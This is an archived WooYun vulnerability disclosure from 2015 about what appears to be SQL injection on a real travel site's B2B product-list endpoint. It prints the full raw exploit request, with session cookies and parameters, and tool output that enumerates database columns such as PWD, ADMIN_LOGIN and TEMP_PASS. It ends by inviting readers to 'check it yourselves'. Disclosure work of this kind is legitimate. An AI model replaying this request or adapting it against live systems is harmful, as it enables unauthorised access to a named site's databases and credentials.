WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles, browse online--------http://drop.zone.ci/
2015-10-03: Details reported to the vendor, awaiting vendor handling
2015-10-08: Vendor has confirmed; details disclosed to the vendor only
2015-10-18: Details disclosed to core white hats and experts in related fields
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to intern white hats
2015-11-22: Details disclosed to the public
As the title states.
Test:
POST /b2b/prod_list_ajax.jsp HTTP/1.1
Host: fenxiao.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 178
Accept: */*
Origin: http://fenxiao.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fenxiao.lvmama.com/b2b/prod_list.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1X79EWfLzjUDjwAAg==; CoreID6=81323363387714425754327&ci=90409730; _lvTrack_UUID=1474E648-6D2E-44E3-AF56-2B3DE7634870; lvsessionid=6eda4b74-db89-4ed6-b3f0-a628d51b5430_18400608; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; JSESSIONID=fK6cK_BxQZF4; startadd=10011; a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9Ua60ma5Iaa5IaY5GiZ6ASb5zmY5w+mJiR2Xpxmb9s2chFzc0EmJfd3YzVFdp9DZy0TNwAjMmc; 87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZy0DO4UTMmgHb0l2XklSPjZXd0N3X5RGc9UiMnZ2X1N3cfRWa9QjMwUDM3InJzVXZfJmbtFTZm0XafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFTMmQXdlNlcp9DZx0jM0MTNmY; sourceid=19; 67df798e21e2dfa38ce087214349f9b3=mcs9VZp9DZz0nJzVXZfJWa9QTMzIDN2UmJiR2Xpxmb9s2chFzc0EmJfd3YzVFdu9WYl1ePKWOolWOtlWOtYa+n6SuuueeoQeuhFWOrPWCujZXd0N2XklTP4ITNxgCOnZ2X1N3cfRWa9QjMwUDM3IgJ==; _lvTrack_sessionID=1BC64181-12AA-4FE6-8B8F-6AC606BDCB6D; orderFromChannel=bing; __utmt=1; __xsptplus443=443.2.1442580067.1442580462.8%234%7C%7C%7C%7C%7C%23%23KC--73_S5PSqQXPHmXJaDKIHJH8ApGTC%23; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442576325; Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442580462; __utma=30114658.555334212.1442575433.1442575433.1442579732.2; __utmb=30114658.46.10.1442579732; __utmc=30114658; __utmz=30114658.1442579732.2.2.utmcsr=pufa.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/; bfd_s=30114658.98025856.1442579732433; tmc=38.30114658.23301528.1442579732436.1442580403663.1442580462914; tma=30114658.30289188.1442575434188.1442575434188.1442575434188.1; tmd=53.30114658.30289188.1442575434188.; utag_main=v_id:014fe07d6a09001ee167fbff27b12206d001806500bd0$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1442582263890$ses_id:1442580359689%3Bexp-session; bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDn9J9XTZq5ICUVFiY5xaaSGnswzLnZ5fMPdL9LvzsOTorEZlMtMZiixNZ%2FNAdp4hsOM61BZPExUO3lqlR89zEcWLn%2FRQf9TdmwRUiOVC%2BY7kW1oQwcXil0%2B6ndkhaE9Vcj69K71aZWMxeLoPWcJ4ylPaJgRxh2xifKqrnirxUPjo%3D; bfd_g=9de2782bcb754fd7000031ec004eb3b555fbf449; 90409730_clogin=v=1&l=1442579732&e=1442582334485; dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1ePKWOolWOtlWOtYa+n6SuuueeoQeuhFWOrPWCupZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XPhNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmY

start=0&limit=40&key=3213123&tree_id=0&cust_id=&area=&ad=&fw=&pay=&confirm=>=&tag=&line=&group=&tname=&grade=&internet=&brekker=&action=list&testid=1003&sort=view_name&dir=DESC
Privileges:
ADMIN_LOGIN:
[08:29:32] NAME
[08:29:32] EXTENSION_ID
[08:29:32] ACCOUNTS
[08:29:32] PROVINCIAL
[08:29:32] CHROMOSOME_ID
[08:29:32] OPERATIONID
[08:29:32] TRANSACTION_ID
[08:29:32] MSG_ID
[08:29:37] ACCOUNT_ID
[08:29:41] SCHLUSSELWORT
[08:29:49] PWD
[08:30:05] AIM
[08:30:20] TEMP_PASS
Check it yourselves :-)
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-10-08 11:01
thx
None yet